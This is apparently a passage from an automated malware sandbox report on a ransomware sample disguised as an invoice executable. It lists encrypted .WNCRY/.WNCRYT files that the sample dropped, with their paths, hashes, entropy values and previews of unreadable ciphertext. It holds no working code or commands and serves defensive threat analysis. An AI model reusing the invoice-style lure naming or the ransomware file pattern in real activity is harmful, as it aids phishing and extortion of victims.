                                                          SHA-256:3823E323728BD339393EBCA0381043B1DF2648AF3609A2FBF9C780C72A9A5270
                                                          SHA-512:DFCBEF1B75CE6C32C3A834E82F5518180645A08E20920368048EB6962E7660D90AA8734C00646EF871869B74BB67DC6766E92329697626BD7AD43602013B5FBD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#.q.$rw\..-r.` d.n.&.W.%......(.G.....I.x. 6.R.........$.....K.3....({Z....i.V ..O.Ud..v.<.."..@&..-$.t...{.R..V. .x.|E}w....&D.^..X.]..WK`.Y.}....3.du.H..g..jz..~.\....V.9Cy.4.J/.,..$..k..Zur.~&...4.N!f9./.gp...N...d....l.(;Aa........{4...k'..............O.E.c.&.T@,.r..09u.efm.8..|.E>.e....-.........!.Oq0X....=.gh.C..k-...0/L.Rq...(..5.8..2..wp.IV@...D3.g.`..........p..+WIP.e&6.>....vO...WY....>..Xk....|a..A.)...3s.Sv..*&.>`..-......sS<.....J..T....h..DP[.[....e..1...?...U.e..'0jZB....#A..t.$@....R.z...(..$....o.ZK...a...m.:.qHqm.h.L.......+..G.;...YJG*..].-.....nwhK.d..A.........1..............._.|.y.T..@f.Os. .?..c71t........dtsy...C...=...:.n.."w.k....e..1..F..u<._g=.h.Vrh.....(=@............u.%.W0i...r...Xo@.P.8....!....`sS.x"...9.?.V9\M...L..!..$..!..+Y.i..N....w...s>fc&.G.=..BI$?..k1...6..M..=4.O..mO..;......o..:.}....W..p..b...1.._.......],2'......@.. :.Z..)xc.*...;=.2f;..R...3(.@...e..a......w...:X5..s..*....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582733672226.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117512
                                                          Entropy (8bit):7.998242002676668
                                                          Encrypted:true
                                                          SSDEEP:1536:oCc4gQymCR8SgjMBFNxXf8BYvjuvPMd5f0JLLw4+Gdi0kI5tL5nQMZfrM9+wcOco:o1riCR9B3xi6qvP0eJXx9vQ4fsyhUCcv
                                                          MD5:E5C9ED9AC03DF4A7F55E61B4335E4A55
                                                          SHA1:C9A1C61BD2D550848E2DFFEE419C41569CE6A78E
                                                          SHA-256:3823E323728BD339393EBCA0381043B1DF2648AF3609A2FBF9C780C72A9A5270
                                                          SHA-512:DFCBEF1B75CE6C32C3A834E82F5518180645A08E20920368048EB6962E7660D90AA8734C00646EF871869B74BB67DC6766E92329697626BD7AD43602013B5FBD
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#.q.$rw\..-r.` d.n.&.W.%......(.G.....I.x. 6.R.........$.....K.3....({Z....i.V ..O.Ud..v.<.."..@&..-$.t...{.R..V. .x.|E}w....&D.^..X.]..WK`.Y.}....3.du.H..g..jz..~.\....V.9Cy.4.J/.,..$..k..Zur.~&...4.N!f9./.gp...N...d....l.(;Aa........{4...k'..............O.E.c.&.T@,.r..09u.efm.8..|.E>.e....-.........!.Oq0X....=.gh.C..k-...0/L.Rq...(..5.8..2..wp.IV@...D3.g.`..........p..+WIP.e&6.>....vO...WY....>..Xk....|a..A.)...3s.Sv..*&.>`..-......sS<.....J..T....h..DP[.[....e..1...?...U.e..'0jZB....#A..t.$@....R.z...(..$....o.ZK...a...m.:.qHqm.h.L.......+..G.;...YJG*..].-.....nwhK.d..A.........1..............._.|.y.T..@f.Os. .?..c71t........dtsy...C...=...:.n.."w.k....e..1..F..u<._g=.h.Vrh.....(=@............u.%.W0i...r...Xo@.P.8....!....`sS.x"...9.?.V9\M...L..!..$..!..+Y.i..N....w...s>fc&.G.=..BI$?..k1...6..M..=4.O..mO..;......o..:.}....W..p..b...1.._.......],2'......@.. :.Z..)xc.*...;=.2f;..R...3(.@...e..a......w...:X5..s..*....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582984954725.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117080
                                                          Entropy (8bit):7.998335185823374
                                                          Encrypted:true
                                                          SSDEEP:3072:HdFonTpVx2sUmEe5fLaVNW1r9CFsyZN5+gGq+kylQ26l:vonTp2sBE+iUCFsuNUlQ26l
                                                          MD5:7C67C4374FF951C8CB2B2B5170B06AB9
                                                          SHA1:A682E6FD331249D4E1BC91E2C51B0A82AF667525
                                                          SHA-256:3DC37BA9A8F83AECF3114AD66BD05B5D12FAB5F1EFDF8B1F22F30FC68C47DADD
                                                          SHA-512:B1DF6AFA49AE0AA19E3344008AC974E903AB14EA56E5450CDF094FF560723E09E50911AF166C49BB127FE329F016A68A228C5A16027764995D945240B5D76EAE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....f.^.E...T,.0.*.=....n......X...?k...~t....z._...{...q......V.,iH...nf\.E...'......].p!...B..+...%..vX..... lQY.>..V...V...c....oMM.+..n(..q..J|<..V..b..0.....`..c..... ....b.2..x..J..3.Q=.\...dnD...G{N.....7..yk_...V.U..=..'..H....`.k....@..j....4..........+..A.#..@...../..,....v.-....w.n@........&........w8j*/Us..K....XV.S.........n.....R.U..NH.|.G..X.F...I...e..........d....J2._\.M..V.8.Ye...1v....D.6D3.dn.v.g......UP....X.,y.#......Ow..3k.....g.~.B.M._.....m....h.,=..zI(..5z.6..........I..oJ..(..........cJ..]1.}gS........j.PV.....j.De......e.......&)Aw|t-.6...|.'....Z..]l.#:.>w6.......A.....Q.@.....z..#....w......X.+.H..q.;L.S*4qN.J.9z..a.:<.H.>?G...XK.Mk......5..`.<Cn....b..as..l..".Q..8A...."..$P.x.F..q..`.ixl.R...$W.\6..m..tY.;.d....eOx`JJ.s;.ExF..<.......QZ...*..PL...l.g1.7Jgl....u.Zf*..P...a5.J..3`.E...g..Fv.......f.}X.]TS;..N..W,...4.~..C1....p.0o..7.fi.. ..7.....M.....!Z.}e..V8....M..I,.c.87...).\@...,..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582984954725.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117080
                                                          Entropy (8bit):7.998335185823374
                                                          Encrypted:true
                                                          SSDEEP:3072:HdFonTpVx2sUmEe5fLaVNW1r9CFsyZN5+gGq+kylQ26l:vonTp2sBE+iUCFsuNUlQ26l
                                                          MD5:7C67C4374FF951C8CB2B2B5170B06AB9
                                                          SHA1:A682E6FD331249D4E1BC91E2C51B0A82AF667525
                                                          SHA-256:3DC37BA9A8F83AECF3114AD66BD05B5D12FAB5F1EFDF8B1F22F30FC68C47DADD
                                                          SHA-512:B1DF6AFA49AE0AA19E3344008AC974E903AB14EA56E5450CDF094FF560723E09E50911AF166C49BB127FE329F016A68A228C5A16027764995D945240B5D76EAE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....f.^.E...T,.0.*.=....n......X...?k...~t....z._...{...q......V.,iH...nf\.E...'......].p!...B..+...%..vX..... lQY.>..V...V...c....oMM.+..n(..q..J|<..V..b..0.....`..c..... ....b.2..x..J..3.Q=.\...dnD...G{N.....7..yk_...V.U..=..'..H....`.k....@..j....4..........+..A.#..@...../..,....v.-....w.n@........&........w8j*/Us..K....XV.S.........n.....R.U..NH.|.G..X.F...I...e..........d....J2._\.M..V.8.Ye...1v....D.6D3.dn.v.g......UP....X.,y.#......Ow..3k.....g.~.B.M._.....m....h.,=..zI(..5z.6..........I..oJ..(..........cJ..]1.}gS........j.PV.....j.De......e.......&)Aw|t-.6...|.'....Z..]l.#:.>w6.......A.....Q.@.....z..#....w......X.+.H..q.;L.S*4qN.J.9z..a.:<.H.>?G...XK.Mk......5..`.<Cn....b..as..l..".Q..8A...."..$P.x.F..q..`.ixl.R...$W.\6..m..tY.;.d....eOx`JJ.s;.ExF..<.......QZ...*..PL...l.g1.7Jgl....u.Zf*..P...a5.J..3`.E...g..Fv.......f.}X.]TS;..N..W,...4.~..C1....p.0o..7.fi.. ..7.....M.....!Z.}e..V8....M..I,.c.87...).\@...,..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410583284348700.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):116040
                                                          Entropy (8bit):7.9985113926226425
                                                          Encrypted:true
                                                          SSDEEP:3072:p51WRfcRMb49D60sMrEeM3gm4q+86puXCy:/1WRfcp9D60prE2m42XCy
                                                          MD5:1E108EE5AC886585A95DCC24411ED0D2
                                                          SHA1:5E61B80591818941C51B517E101ECE0F69C8DBA3
                                                          SHA-256:678F421D606701064DE876664007CE1743CA6817A7F1709764E32B34A0A3067B
                                                          SHA-512:4A8BEA350F91CA8CE75D6731C1FBD718E3FDB813B413080C523C58A37957A9F558E33A46587B6DBAB13C46A19338E40D49FE821FB5CD56903EC6E597BB650413
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......gO..W.6..G.%{px..-6W.G.T.}U....|.T.#..^.Q.r.F...8.Qs....+..E!.{{m..jr5...}.......U.+./M...I..nq.$L<.....?y...O.j........1.!`.D{.....b.2.q8._.W.g..?`...R...".g..H.r.5.......e...;L(l.px.u...l...]..ac........./.{D.m...,..;..uC.&.2.".L...{..h..gw.$..../..........b...>G@..}..01..V....'.......T..D......{...+m/X...V}..T`.....E<..lO.|.{eH..j.y...EN..)<u.zJc.M.......uG[g...=9.y..Nz9...c.E.p;@z.k2y2.-........8...>.....3...0gd.............(..F..-....X....If..E.Ge{.S.A.jH...z.].o...R......?.d.D.d<.H....%.r.&?C......!I..$S.j 7(.f8z[....1........:H...bYo`....1b.d.o..I.D..l'\2~%RkpZa.QV....}AY..3L.....mR......q....R.90....t.ey|.,J=U......5..z.....(]..@....uJa6..+.....~..t...l..%.D..*.(t.U.ha....C....#C@.Y8..f.....g.5.9........j.`.~.J.......-.1.@.j.l...l.p{|..A/.......w.55^..zDV.r.c......0~"O.mf..........*g..p..b$.A9.....].]^E./....]]0........_&.'U.T..C..%...W).Npq.>.mgaL\..vd......6S..l...n.=A.2>.*k.~y._,=oU.#.0.y.2|.,A...:.9.-.b......B.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410583284348700.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):116040
                                                          Entropy (8bit):7.9985113926226425
                                                          Encrypted:true
                                                          SSDEEP:3072:p51WRfcRMb49D60sMrEeM3gm4q+86puXCy:/1WRfcp9D60prE2m42XCy
                                                          MD5:1E108EE5AC886585A95DCC24411ED0D2
                                                          SHA1:5E61B80591818941C51B517E101ECE0F69C8DBA3
                                                          SHA-256:678F421D606701064DE876664007CE1743CA6817A7F1709764E32B34A0A3067B
                                                          SHA-512:4A8BEA350F91CA8CE75D6731C1FBD718E3FDB813B413080C523C58A37957A9F558E33A46587B6DBAB13C46A19338E40D49FE821FB5CD56903EC6E597BB650413
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......gO..W.6..G.%{px..-6W.G.T.}U....|.T.#..^.Q.r.F...8.Qs....+..E!.{{m..jr5...}.......U.+./M...I..nq.$L<.....?y...O.j........1.!`.D{.....b.2.q8._.W.g..?`...R...".g..H.r.5.......e...;L(l.px.u...l...]..ac........./.{D.m...,..;..uC.&.2.".L...{..h..gw.$..../..........b...>G@..}..01..V....'.......T..D......{...+m/X...V}..T`.....E<..lO.|.{eH..j.y...EN..)<u.zJc.M.......uG[g...=9.y..Nz9...c.E.p;@z.k2y2.-........8...>.....3...0gd.............(..F..-....X....If..E.Ge{.S.A.jH...z.].o...R......?.d.D.d<.H....%.r.&?C......!I..$S.j 7(.f8z[....1........:H...bYo`....1b.d.o..I.D..l'\2~%RkpZa.QV....}AY..3L.....mR......q....R.90....t.ey|.,J=U......5..z.....(]..@....uJa6..+.....~..t...l..%.D..*.(t.U.ha....C....#C@.Y8..f.....g.5.9........j.`.~.J.......-.1.@.j.l...l.p{|..A/.......w.55^..zDV.r.c......0~"O.mf..........*g..p..b$.A9.....].]^E./....]]0........_&.'U.T..C..%...W).Npq.>.mgaL\..vd......6S..l...n.=A.2>.*k.~y._,=oU.#.0.y.2|.,A...:.9.-.b......B.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584556659274.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998302321403549
                                                          Encrypted:true
                                                          SSDEEP:3072:gUZK/K0L7k0Em3TGx0YZFgsjOAkuUx/4U/sRKjFMLJU1iswI:gUZ503bDg0ajP7a/4yJjwI
                                                          MD5:1E6BB268CD8A572CFE02949E38346D0F
                                                          SHA1:492114B85CA535F77847AB0AB844D7D24EB689EC
                                                          SHA-256:6EEC18DE37621AB78B92BCDD239F775BD64FC7B3C66B14A0352A43D6CAD51107
                                                          SHA-512:3DDCFF0B6A0D5970DFE35F049BF1EA3CDB2CC000AB93557192CDE93A8DCE12B0DE23CA83E8942322B344EB17908A0701F516B732AE1F9888802BA7F1054E31C5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S..Ll....K.....a.J....={..............ra..2..Y....b.]..E...I=^..cn..7>...>Y,.3.....L..w..q|.t........ab.3.q..~....%u5......@....c..6.c.8....k....aJ>..0...|...Hx.F.z..'>.0..v.q.>...>..J..m;..ZN=.....n.yd....[...t^.&...|...n....hu7...\x.........~.......Y......#...u.......i}.1,....!D.'.....b[..YeS.N.&5A.+....:...z.0h..9........T..(....3(......x...]...8.ZX=`......$....5..h....|.8V..j,C<A.I..I*.y.....H...F.V:..^....$y.F.....B|K...Q.....SXL0S@....#.?...D0.......EI....IV...0..2.-F....@Wq.O..YM. .8.Cs..`..!....`d..DE.g...%o..?]..s..wd.^.o.ZV.Wh.{..z.B.(.Y...}.9......h.D_.~...n...2...M1.....I.B=p.I.........<N=*.....8..$.f[h.&+..Rdes..;...7.7.C........v..n...M.N.{..F6.9....CY...M-"t.`E6x....fr.c".d..P.Al:].Ck...Tf%....V.8.f.s.....b.s._..-..d.sv.....^...N...~....z.+.*.O8...9so......_..u.h.B.W_.1..2..{.....^}'y..^.yej".b.%.......p:S......<..<.....[..........F6.1M...'..v.\#...v..5.o...........yfGWw....Y.PM..ly..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584556659274.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998302321403549
                                                          Encrypted:true
                                                          SSDEEP:3072:gUZK/K0L7k0Em3TGx0YZFgsjOAkuUx/4U/sRKjFMLJU1iswI:gUZ503bDg0ajP7a/4yJjwI
                                                          MD5:1E6BB268CD8A572CFE02949E38346D0F
                                                          SHA1:492114B85CA535F77847AB0AB844D7D24EB689EC
                                                          SHA-256:6EEC18DE37621AB78B92BCDD239F775BD64FC7B3C66B14A0352A43D6CAD51107
                                                          SHA-512:3DDCFF0B6A0D5970DFE35F049BF1EA3CDB2CC000AB93557192CDE93A8DCE12B0DE23CA83E8942322B344EB17908A0701F516B732AE1F9888802BA7F1054E31C5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S..Ll....K.....a.J....={..............ra..2..Y....b.]..E...I=^..cn..7>...>Y,.3.....L..w..q|.t........ab.3.q..~....%u5......@....c..6.c.8....k....aJ>..0...|...Hx.F.z..'>.0..v.q.>...>..J..m;..ZN=.....n.yd....[...t^.&...|...n....hu7...\x.........~.......Y......#...u.......i}.1,....!D.'.....b[..YeS.N.&5A.+....:...z.0h..9........T..(....3(......x...]...8.ZX=`......$....5..h....|.8V..j,C<A.I..I*.y.....H...F.V:..^....$y.F.....B|K...Q.....SXL0S@....#.?...D0.......EI....IV...0..2.-F....@Wq.O..YM. .8.Cs..`..!....`d..DE.g...%o..?]..s..wd.^.o.ZV.Wh.{..z.B.(.Y...}.9......h.D_.~...n...2...M1.....I.B=p.I.........<N=*.....8..$.f[h.&+..Rdes..;...7.7.C........v..n...M.N.{..F6.9....CY...M-"t.`E6x....fr.c".d..P.Al:].Ck...Tf%....V.8.f.s.....b.s._..-..d.sv.....^...N...~....z.+.*.O8...9so......_..u.h.B.W_.1..2..{.....^}'y..^.yej".b.%.......p:S......<..<.....[..........F6.1M...'..v.\#...v..5.o...........yfGWw....Y.PM..ly..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584609702615.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998470715187754
                                                          Encrypted:true
                                                          SSDEEP:3072:0qisyLRAPEVoH85HSuoNGMQE4Xo8ee+WCTt:u+8Voc5HSUMEkWCJ
                                                          MD5:EA1F77568CE3C93FF187E9BE0340BB7B
                                                          SHA1:9B00088E957251FD28A42A795A9A5B7633A7D8E8
                                                          SHA-256:BA3D43CC3C0B6B54645B8F80CD61646F69DA9CEB21A24706429E52E01A37D63E
                                                          SHA-512:052920828303E32719F06BBEE4D08AFBA3D5401AFD40A64851D34A55CF60D92F0F4CA974B160EC9C02D298F7E23A5A6C71BDD7D3DDE430686A355C7ADCF28847
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....H.....r.-....M"=..m.R....+@...H.(4b3..l..0-&.."."V.:....]....P...W..#.<.%.....l.-.d|.L.......L/k8.~V.zWM..bS...QD...A..+...e..S2.]....&sZ2..f"B....k.#B.".5...qXGm.1...w7.b..........B(l.~y.]T....\,Tx...o."a...Y>.".....gw8&............k.U..].0.wf....~.......k...1...a..h..N..P..%.....w....:.7......!2.[m..aty.W...t37._....8Z`.....i.;._..P..[6.e.*.c,.QY..|.....C,...7.$..FA..... o...0j.../q.`...4...|S..l..5....x`.)$.K....W....t.E...HI...pI.OT.=.3..H...,.$CSU.A...^....q.r.]....w..)n...Of...3D.....U..z....Ec..c..E..5eE."...$.$.....n..J.z-...r.C.2...}.B....{..{wT.....=.P9UX......@..+0.}..\.x..y]..]&~T..}.;..)_W......l..]._3'*1.W.?.~p<6."........!_"../CM...~7>. ......@.x.D/..'4I..W.J.s. 7.D~`..D..oD.......i.......H..*X..l........F.B..Mp.T.%Z|.....'.]....T..w;.19.O.....Jj[<..\...`...."..........5..T=..,...(-.r..."./}x..'.7i.H...........6Y..l2.>.:.7C`q..L..1.....v..O.[h.S.R..n.SPZ..K...GT..........#.f.....W.i.c....T....w.._.G.R6

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584609702615.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998470715187754
                                                          Encrypted:true
                                                          SSDEEP:3072:0qisyLRAPEVoH85HSuoNGMQE4Xo8ee+WCTt:u+8Voc5HSUMEkWCJ
                                                          MD5:EA1F77568CE3C93FF187E9BE0340BB7B
                                                          SHA1:9B00088E957251FD28A42A795A9A5B7633A7D8E8
                                                          SHA-256:BA3D43CC3C0B6B54645B8F80CD61646F69DA9CEB21A24706429E52E01A37D63E
                                                          SHA-512:052920828303E32719F06BBEE4D08AFBA3D5401AFD40A64851D34A55CF60D92F0F4CA974B160EC9C02D298F7E23A5A6C71BDD7D3DDE430686A355C7ADCF28847
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....H.....r.-....M"=..m.R....+@...H.(4b3..l..0-&.."."V.:....]....P...W..#.<.%.....l.-.d|.L.......L/k8.~V.zWM..bS...QD...A..+...e..S2.]....&sZ2..f"B....k.#B.".5...qXGm.1...w7.b..........B(l.~y.]T....\,Tx...o."a...Y>.".....gw8&............k.U..].0.wf....~.......k...1...a..h..N..P..%.....w....:.7......!2.[m..aty.W...t37._....8Z`.....i.;._..P..[6.e.*.c,.QY..|.....C,...7.$..FA..... o...0j.../q.`...4...|S..l..5....x`.)$.K....W....t.E...HI...pI.OT.=.3..H...,.$CSU.A...^....q.r.]....w..)n...Of...3D.....U..z....Ec..c..E..5eE."...$.$.....n..J.z-...r.C.2...}.B....{..{wT.....=.P9UX......@..+0.}..\.x..y]..]&~T..}.;..)_W......l..]._3'*1.W.?.~p<6."........!_"../CM...~7>. ......@.x.D/..'4I..W.J.s. 7.D~`..D..oD.......i.......H..*X..l........F.B..Mp.T.%Z|.....'.]....T..w;.19.O.....Jj[<..\...`...."..........5..T=..,...(-.r..."./}x..'.7i.H...........6Y..l2.>.:.7C`q..L..1.....v..O.[h.S.R..n.SPZ..K...GT..........#.f.....W.i.c....T....w.._.G.R6

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410586637015569.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998288121563079
                                                          Encrypted:true
                                                          SSDEEP:3072:CPDiBIkAYfAfPHkeu25urYjDhxvlP0F8Utgm:CqofPHe0UYPhBlc8UtP
                                                          MD5:01C92567B71F929C49971BF52C4A0EB0
                                                          SHA1:9D8EDB397540A462D1A22C2C19B336C9CE73206C
                                                          SHA-256:D36F96F502A56DDADD622CCA99A9204A87C06C212ABC94A22D391A378C667632
                                                          SHA-512:12D7979D6CF8717F3EBF3D0A88504655FCB88056636EDC396C3AC5B6ADCA2712609240728C8CF680C5D5BCD74B81B931B379D0F587458FF90759B955D186D91C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........a.........2..N.o.y....k|....d..d.apU........,..:3.....G..h..!.7.-...<..yC4.N.l....T4...Q..~.v.r...)..^f...5....x./.M.6#....i.....m<d.[..Ch......QL...:*.%3X.t..a..2.628&..9?.... ....=9.<.kp.a2...\j...O... GeD.;.. ...b.*..<.-...'..NUu............F.,i..1)..&S|.....A.p...T"~..pX...X.u.3...e+.8.-....ZP.f..p..|A...b...%`...Gf....8P[G..K.PjI......M.<V.u9*.Co..#...E7!BK.m..B5...q...|q{..qD'..&......m..3p..B2l\.[.....~.`..F7...0.y...@L....p+..;.8$.7=....&r........\..5...?...Qg.............@...[;.....3.1(....D=.k.6.*q..pE.J.>.Tr!Hd..G.!\`z.....z.Sz...B.a.....-.F..N[.{..!..)NF......k...@.....`.,..Aj.zT.,....J.... ....aI.......@W......oR....L..-T.~.....'..i...J..|.q......Iw.W7...h.........^.~.........;..........w...t..p.Pd.|......N.....R....0:..Y...iSz.:5.~}.r..K=.."s%.Q..... ...E\]....7g.m......R._K.D...+.b|...;Dq.\.'.Nx.I.R..tb..R[..g........h..$.....O.C.......g.:.....eV.8,.q.|'.q......./.8..u....j)Ag.c. ....}..Y.U.=....i..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410586637015569.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998288121563079
                                                          Encrypted:true
                                                          SSDEEP:3072:CPDiBIkAYfAfPHkeu25urYjDhxvlP0F8Utgm:CqofPHe0UYPhBlc8UtP
                                                          MD5:01C92567B71F929C49971BF52C4A0EB0
                                                          SHA1:9D8EDB397540A462D1A22C2C19B336C9CE73206C
                                                          SHA-256:D36F96F502A56DDADD622CCA99A9204A87C06C212ABC94A22D391A378C667632
                                                          SHA-512:12D7979D6CF8717F3EBF3D0A88504655FCB88056636EDC396C3AC5B6ADCA2712609240728C8CF680C5D5BCD74B81B931B379D0F587458FF90759B955D186D91C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........a.........2..N.o.y....k|....d..d.apU........,..:3.....G..h..!.7.-...<..yC4.N.l....T4...Q..~.v.r...)..^f...5....x./.M.6#....i.....m<d.[..Ch......QL...:*.%3X.t..a..2.628&..9?.... ....=9.<.kp.a2...\j...O... GeD.;.. ...b.*..<.-...'..NUu............F.,i..1)..&S|.....A.p...T"~..pX...X.u.3...e+.8.-....ZP.f..p..|A...b...%`...Gf....8P[G..K.PjI......M.<V.u9*.Co..#...E7!BK.m..B5...q...|q{..qD'..&......m..3p..B2l\.[.....~.`..F7...0.y...@L....p+..;.8$.7=....&r........\..5...?...Qg.............@...[;.....3.1(....D=.k.6.*q..pE.J.>.Tr!Hd..G.!\`z.....z.Sz...B.a.....-.F..N[.{..!..)NF......k...@.....`.,..Aj.zT.,....J.... ....aI.......@W......oR....L..-T.~.....'..i...J..|.q......Iw.W7...h.........^.~.........;..........w...t..p.Pd.|......N.....R....0:..Y...iSz.:5.~}.r..K=.."s%.Q..... ...E\]....7g.m......R._K.D...+.b|...;Dq.\.'.Nx.I.R..tb..R[..g........h..$.....O.C.......g.:.....eV.8,.q.|'.q......./.8..u....j)Ag.c. ....}..Y.U.=....i..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498762936491601.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):114264
                                                          Entropy (8bit):7.998360512512525
                                                          Encrypted:true
                                                          SSDEEP:3072:jJyEOi4X8ts/Hh8P25Ws6MX8/OqNM+z8xzs96bnk/:6MtIB8P2gE6D6E
                                                          MD5:86C6D07B4D8B0F55CBD4D90965B30C35
                                                          SHA1:0671CE1FBDD2D8591638611EFDCA074F1AC68ABE
                                                          SHA-256:0CCDDD63FD1FBE6517E7BC68C93937E41E054A84BC0C4CA58C5A733CA6E2F0FB
                                                          SHA-512:05C5A4E6FB026CFAACBB50007B65FB4AD036D503AA532EF94F128FB02956E00F396988895AE9922D9CFA82AE4228CF4095AF504F9881865C46C10F56BE503CAF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....!...#.~..p...C...g........m........E...2.H.,...|\hv..+X..tx.... .{>j..m1._...0.v..^.}.>.b8........0..d#I.m..o......9.{Et/.+.g.T.|........_...sE.....x'Ml......t..f......OP...........[.../.4.U)..Gb..~..M.c%..S.......g..-&..._...w.l.IF..p..<L..@e....7..........tE.1.8..Z..Bn.-I.&..|..gw.Q).V+CE...q.....(mu]^e.\....*.H.F..Z.R.6..G......L..3.=.h^OA..&).(.`.f.. e..L=gy."q..6.2..u....V.....>.C....?n..\c. .q.}.5R....M.u!.[(..d.Q$n..4%...U...[}%.t.X......._.....!.Q.n-....I...;...<1.6..e.].B#...DZ.J......>.Q..2.<...h...s....9:ltO..X....p.w.Ru.[. }...]E\O.......`.....g.X2...2G..O..5..R.gE...p.DZ....R...Ir...v...Y..........M).....P.....5..|o....L....#....e..-..'..h.iO*a...4....w..........l.p......*.!C.<.8k.f..+.{....R.5yZK.....L+2.o9<....P..Z....[....=..NJ....h/.b.......-^.q4.+g.....0.......hA..I'.O...zH.......c..1.}d.i.&..kxk..5.."8SCM.S.../..\..'.6l..iR..v....>C..V......h`[}k...%hi.....z...@.A.S/Rw.=hK.H..|(.}...g.#.v.&.G....EV....*Z0.4Xc

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498762936491601.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):114264
                                                          Entropy (8bit):7.998360512512525
                                                          Encrypted:true
                                                          SSDEEP:3072:jJyEOi4X8ts/Hh8P25Ws6MX8/OqNM+z8xzs96bnk/:6MtIB8P2gE6D6E
                                                          MD5:86C6D07B4D8B0F55CBD4D90965B30C35
                                                          SHA1:0671CE1FBDD2D8591638611EFDCA074F1AC68ABE
                                                          SHA-256:0CCDDD63FD1FBE6517E7BC68C93937E41E054A84BC0C4CA58C5A733CA6E2F0FB
